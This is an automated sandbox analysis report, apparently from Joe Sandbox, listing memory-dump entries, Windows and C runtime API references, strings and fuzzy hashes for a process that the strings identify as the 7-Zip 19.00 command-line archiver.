                                              • The file operation error for listfile, xrefs: 0045FF71
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$ExceptionThrow
                                              • String ID: Cannot find listfile$Incorrect item in listfile.Check charset encoding and -scs switch.$The file operation error for listfile
                                              • API String ID: 4001284683-1604901869
                                              • Opcode ID: 96405dd8fb92279f030b02bc931f9dc36b9c89402a3ea1ebc254a3a14f5713aa
                                              • Instruction ID: 22e075ab9264ab4f58ed70433ca602481d0ad9db523db34f391cdc64368a78fd
                                              • Opcode Fuzzy Hash: 96405dd8fb92279f030b02bc931f9dc36b9c89402a3ea1ebc254a3a14f5713aa
                                              • Instruction Fuzzy Hash: EA51A17231468592CA20DB16E88079FB721F7967D8F50011BEF9913B5AEFADC90ACB05
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$ErrorLast
                                              • String ID:
                                              • API String ID: 408039514-0
                                              • Opcode ID: 56e310f5247428a7174e856c66c809f8f157f3f47fc266d476a18a669d8f27e7
                                              • Instruction ID: 6325397cbc0fc4c1c67b5bf5f172898ba96d43aa484601dc5f80eddd84d53b3e
                                              • Opcode Fuzzy Hash: 56e310f5247428a7174e856c66c809f8f157f3f47fc266d476a18a669d8f27e7
                                              • Instruction Fuzzy Hash: 9851792221D90092DA20EF25F49156FA760EBC6396F501127BF9E4367BDF6CC94ECB18
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: fputs
                                              • String ID: = $ERROR$ERRORS:$WARNING$WARNINGS:
                                              • API String ID: 1795875747-2836439314
                                              • Opcode ID: bfaef9fa8df0d205eec04fe16e9a27ef95300a9a3da73fd13572728b12155a0b
                                              • Instruction ID: 9ec0e48c3fd48140d343ff147a11a35f0c1ca9042686248d6c14338a13575cf4
                                              • Opcode Fuzzy Hash: bfaef9fa8df0d205eec04fe16e9a27ef95300a9a3da73fd13572728b12155a0b
                                              • Instruction Fuzzy Hash: DE11AFE6300540A6EF24DF22EA4575A6B20B706B85F088032CF4903E64DF7CCAA8C309
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: fputs$free
                                              • String ID: $ MB$ Memory =
                                              • API String ID: 3873070119-2616823926
                                              • Opcode ID: 07695d8419c59f003fa7f84926a4645375bf0ceb04becd9a3de262dbf0bc1305
                                              • Instruction ID: 6b86d12a1d6651070288ada9637a8dc1a04e33dc028fcfbddac250536e9d0dba
                                              • Opcode Fuzzy Hash: 07695d8419c59f003fa7f84926a4645375bf0ceb04becd9a3de262dbf0bc1305
                                              • Instruction Fuzzy Hash: 6211E2E2200905D1EB209F29E99435A2730F795BE9F459236EF6E43BA8DF3CC599C704
                                              APIs
                                              • fputs.MSVCRT ref: 004930E7
                                              • fputs.MSVCRT ref: 00493104
                                              • fputs.MSVCRT ref: 00493114
                                                • Part of subcall function 00452320: free.MSVCRT ref: 0045237E
                                                • Part of subcall function 00452320: fputs.MSVCRT ref: 004523B8
                                                • Part of subcall function 00452320: free.MSVCRT ref: 004523C4
                                              • fputs.MSVCRT ref: 00493132
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: fputs$free
                                              • String ID: : Can not open the file as [$ERROR$Open $WARNING$] archive
                                              • API String ID: 3873070119-2741933734
                                              • Opcode ID: f32defa99fa0ddd8f5ee8d7903e4695ca461ad93e2af0abed86e02622ffafdb7
                                              • Instruction ID: b0330b7c0ee6a635b2010c5066d261b4875cfd87028164810de597279e41ae9c
                                              • Opcode Fuzzy Hash: f32defa99fa0ddd8f5ee8d7903e4695ca461ad93e2af0abed86e02622ffafdb7
                                              • Instruction Fuzzy Hash: 87F03CA5340905E1EE10DF26E95435A6321B75AFC6F449032DF1E43B609E2CC54DC308
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 00456F6D
                                              • GetTickCount.KERNEL32 ref: 00456F78
                                              • GetCurrentProcessId.KERNEL32 ref: 00456F85
                                                • Part of subcall function 0045339C: free.MSVCRT(00000000,?,?,00000000,004510A8), ref: 004533D7
                                                • Part of subcall function 0045339C: memmove.MSVCRT(00000000,?,?,00000000,004510A8), ref: 004533F2
                                              • GetTickCount.KERNEL32 ref: 00457023
                                              • SetLastError.KERNEL32 ref: 0045705C
                                              • GetLastError.KERNEL32 ref: 00457086
                                                • Part of subcall function 00456C84: CreateDirectoryW.KERNEL32 ref: 00456CA8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: CountCurrentErrorLastTick$CreateDirectoryProcessThreadfreememmove
                                              • String ID: .tmp$d
                                              • API String ID: 3444860307-2797371523
                                              • Opcode ID: 855db8f89ad4192e1f7aaf537696d0c704f64e19782212e671a724ccd2b912be
                                              • Instruction ID: 776856abb6ac793a4979fc5ca9d2e148fd769a02666a5f5771dae334d1cb4bb9
                                              • Opcode Fuzzy Hash: 855db8f89ad4192e1f7aaf537696d0c704f64e19782212e671a724ccd2b912be
                                              • Instruction Fuzzy Hash: 60312267214250D7DB209F26F84075EA3A1B790BCAF444137DF8687B62DA3DC48EC709
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$AddressHandleModuleProc
                                              • String ID: CreateHardLinkW$kernel32.dll
                                              • API String ID: 399046674-294928789
                                              • Opcode ID: 0711bf2b160802de48a7ad8e62ea8a456af0d095c717e74070ad8e7392e23327
                                              • Instruction ID: e1149fa3ee7af1abb762d058ef79947e79079959b96136f9a39690693c92093a
                                              • Opcode Fuzzy Hash: 0711bf2b160802de48a7ad8e62ea8a456af0d095c717e74070ad8e7392e23327
                                              • Instruction Fuzzy Hash: 2621276331195141CE21EB2AEC5176F5310EBC27D6F851237BE9A87766DE2CC84EC608
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: 4a8c016d17941940ccb69cce4f22d951ccabf5595733c0ae8ca37ad45cd0dd66
                                              • Instruction ID: a1a8866e9060a4960c7c7e249fc6129ec86dc3f7379b50bc2f7a9bd51165fe0f
                                              • Opcode Fuzzy Hash: 4a8c016d17941940ccb69cce4f22d951ccabf5595733c0ae8ca37ad45cd0dd66
                                              • Instruction Fuzzy Hash: 7351C523315A4095CA25EF26E44016F6760EBC6BEAB44021BFE5E47796DF7CC54ACB08
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: 4f627721fd3f548a9e12361352d12e7f0c520e4151b4dacedd918d3c46c14af4
                                              • Instruction ID: 1b73e050ca8a6e48830d1cd601b646b75b43d7008c0629db0650ad5b1e8becb8
                                              • Opcode Fuzzy Hash: 4f627721fd3f548a9e12361352d12e7f0c520e4151b4dacedd918d3c46c14af4
                                              • Instruction Fuzzy Hash: 4B41E523715D80A6CB30AE16DA8016E6321F3857A4F590237EF5E17B14EBBCCC86C74A
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7339f14c52790c104396c75c90f75acb671024a89b4c5f409cc22bad2f54e61d
                                              • Instruction ID: 7256a59dd4018cc9045365a4ea3f987f6db78d7adf37eef214ca813aad6ada1c
                                              • Opcode Fuzzy Hash: 7339f14c52790c104396c75c90f75acb671024a89b4c5f409cc22bad2f54e61d
                                              • Instruction Fuzzy Hash: E391CD72605A4086CB20EF26E49035FB760F791B98F50561BEF8A47769DF7CC889CB48
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: d553175bd705add0397085a2f68dee216f55efb8e0660d055bcfc610d1b73714
                                              • Instruction ID: 65389cd02655b27ae865beea9c0be5ee2e3b63298e56ca933587fb39199873ff
                                              • Opcode Fuzzy Hash: d553175bd705add0397085a2f68dee216f55efb8e0660d055bcfc610d1b73714
                                              • Instruction Fuzzy Hash: FE513767209AC485CA20EF26E49069F7765F786F89F005413DF8E63B25CE39C44ACB08
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: 9943e524698941380e30c423019f5bc2cf16f063716f467c35492b6a2cf77687
                                              • Instruction ID: 5af652cc1f85083f14849d7b4b04e8be7cf6f36b1476115db4744ee7204d25a2
                                              • Opcode Fuzzy Hash: 9943e524698941380e30c423019f5bc2cf16f063716f467c35492b6a2cf77687
                                              • Instruction Fuzzy Hash: 7F41F5B7306F8581CA24EB26E5902AE6365F78AF85F449827CB4E43725DF78C486C708
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: 49e297252a2c8ca67cda62bdf5dff8c128a9f435b231509b57c7dc761cb252a3
                                              • Instruction ID: c64cc3d81ecc8163783e50d846e95e3afe8a10e9fe5d74421faea5daf90014a5
                                              • Opcode Fuzzy Hash: 49e297252a2c8ca67cda62bdf5dff8c128a9f435b231509b57c7dc761cb252a3
                                              • Instruction Fuzzy Hash: 1111722370288048CB11AE27DE512AA2221DBC7F99F1D4137AF2D1B35ACE68C8468758
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$memmove
                                              • String ID:
                                              • API String ID: 1534225298-0
                                              • Opcode ID: 37bd50d8d1977fdd302a0b82f53c3d6d511d758968c823be9149fe37c82b5d04
                                              • Instruction ID: 2b57dbc804216490ee45d9995ba61bb355e31d6736faac70fca139d5c9338670
                                              • Opcode Fuzzy Hash: 37bd50d8d1977fdd302a0b82f53c3d6d511d758968c823be9149fe37c82b5d04
                                              • Instruction Fuzzy Hash: 60014023312D4292CA04EF27DE5106D7320FB86F99704416B9F2E4B766DF64D86AC748
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID: /$\$a$z
                                              • API String ID: 1294909896-3795456795
                                              • Opcode ID: 92741b9c6097dc57a5422346ae12ec5673efaeb8d1b2f3031f7aecb4c5395baf
                                              • Instruction ID: 8d7c83d3b4ca719ff467e39668aa1c6365167b622baced58043eecf97a3555cd
                                              • Opcode Fuzzy Hash: 92741b9c6097dc57a5422346ae12ec5673efaeb8d1b2f3031f7aecb4c5395baf
                                              • Instruction Fuzzy Hash: 9141C292A00284E9DBB0BF21E0047BE3760F311B94F8B4A27DE4913394EB7D89D6D709
                                              APIs
                                              Strings
                                              • 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21, xrefs: 0049877E
                                              • Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values, xrefs: 0049878E
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$fputs
                                              • String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values
                                              • API String ID: 2444650769-4238946813
                                              • Opcode ID: 6a807e1f11532017a4cdd53ea1c09d8dec3d45ef8e00fbcf8e020d56cf8062a2
                                              • Instruction ID: c10875dc4802e431f13845644b76777bc7533023fa7173b778d1ad5ca5ef2ebd
                                              • Opcode Fuzzy Hash: 6a807e1f11532017a4cdd53ea1c09d8dec3d45ef8e00fbcf8e020d56cf8062a2
                                              • Instruction Fuzzy Hash: 31216F6330568195CE309B19FA803AAB721B786785F98447BCA4D97B19CF3CC889CB09
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: FindFirstStreamW$FindNextStreamW$kernel32.dll
                                              • API String ID: 1646373207-4044117955
                                              • Opcode ID: ac966f64d20482aa4fd5c134ec705327a834465029026a46f097207993e27cb5
                                              • Instruction ID: f001fbc8bdc6de16f07910f7102def311ef29f796cd424ae6a4ca9820699feb1
                                              • Opcode Fuzzy Hash: ac966f64d20482aa4fd5c134ec705327a834465029026a46f097207993e27cb5
                                              • Instruction Fuzzy Hash: 92E07EE8642A0691EA04DF91F8A835633A0F759751F804075CA0A83320EF3DC15EC708
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$memmove
                                              • String ID:
                                              • API String ID: 1534225298-0
                                              • Opcode ID: a041cbdb6f5740e4120ede61be48ff6f97309ac3af8f67b0fadf56b6372aeade
                                              • Instruction ID: 156560deee2fd63fd6c3f08cde3d75d9992e342171cea5c0177b07286abb12a3
                                              • Opcode Fuzzy Hash: a041cbdb6f5740e4120ede61be48ff6f97309ac3af8f67b0fadf56b6372aeade
                                              • Instruction Fuzzy Hash: 8C31FC23715E8142CA10EE27D5A016E7710ABD6FE9B084227FF6E1B79BCF5DC44A8744
                                              APIs
                                                • Part of subcall function 004596AC: free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000001,00000000), ref: 004596D1
                                              • free.MSVCRT(?,?,?,?,?,?,00000000,00000000,00472160), ref: 004705FD
                                              • free.MSVCRT(?,?,?,?,?,?,00000000,00000000,00472160), ref: 00470607
                                              • free.MSVCRT(?,?,?,?,?,?,00000000,00000000,00472160), ref: 00470612
                                              • free.MSVCRT(?,?,?,?,?,?,00000000,00000000,00472160), ref: 00470639
                                              • free.MSVCRT(?,?,?,?,?,?,00000000,00000000,00472160), ref: 00470643
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,00472160), ref: 00470652
                                              • free.MSVCRT(?,?,?,?,?,?,00000000,00000000,00472160), ref: 00470673
                                              • free.MSVCRT(?,?,?,?,?,?,00000000,00000000,00472160), ref: 00470692
                                              • free.MSVCRT(?,?,?,?,?,?,00000000,00000000,00472160), ref: 004706BC
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$ErrorLast
                                              • String ID:
                                              • API String ID: 408039514-0
                                              • Opcode ID: ba39d191a4783be6191a4353f763b9374f22025bd81bbd69dc5c6e5eb5e84779
                                              • Instruction ID: dfba227cc15294654901cb8c12d02c2c09ff1c4546fb5bf8ddad837972623669
                                              • Opcode Fuzzy Hash: ba39d191a4783be6191a4353f763b9374f22025bd81bbd69dc5c6e5eb5e84779
                                              • Instruction Fuzzy Hash: FB319023315980C6C630DF26E89029BB760F7C6798F441127EB8E87B6ADE2DD859CB04
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: memcmp
                                              • String ID:
                                              • API String ID: 1475443563-0
                                              • Opcode ID: 41d9d86949f01cac63a720bc7b2bd3e9f688eab33a43bcd64fe82cf42b54a768
                                              • Instruction ID: 9706acc66e10d8b8ec382f958cde081a000086bf90a730d9a580cf48a2918fa5
                                              • Opcode Fuzzy Hash: 41d9d86949f01cac63a720bc7b2bd3e9f688eab33a43bcd64fe82cf42b54a768
                                              • Instruction Fuzzy Hash: BE319EE134871190EF04EF2798523A92725974AFD8F855867DE069A306EF3CDA46C30E
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: e90d6bb166ed15ba24e72fcfe06ac02a43145d9266722310fb98f001947c2363
                                              • Instruction ID: 84ef843b3c66b090df380f4ab5d454d9786e22a28e2851e93288cc4fb8179d65
                                              • Opcode Fuzzy Hash: e90d6bb166ed15ba24e72fcfe06ac02a43145d9266722310fb98f001947c2363
                                              • Instruction Fuzzy Hash: 69011A6334B98145C611FB22E66266F6710E7C3B9AF0410A79F4E13712CE7CC44BCB08
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
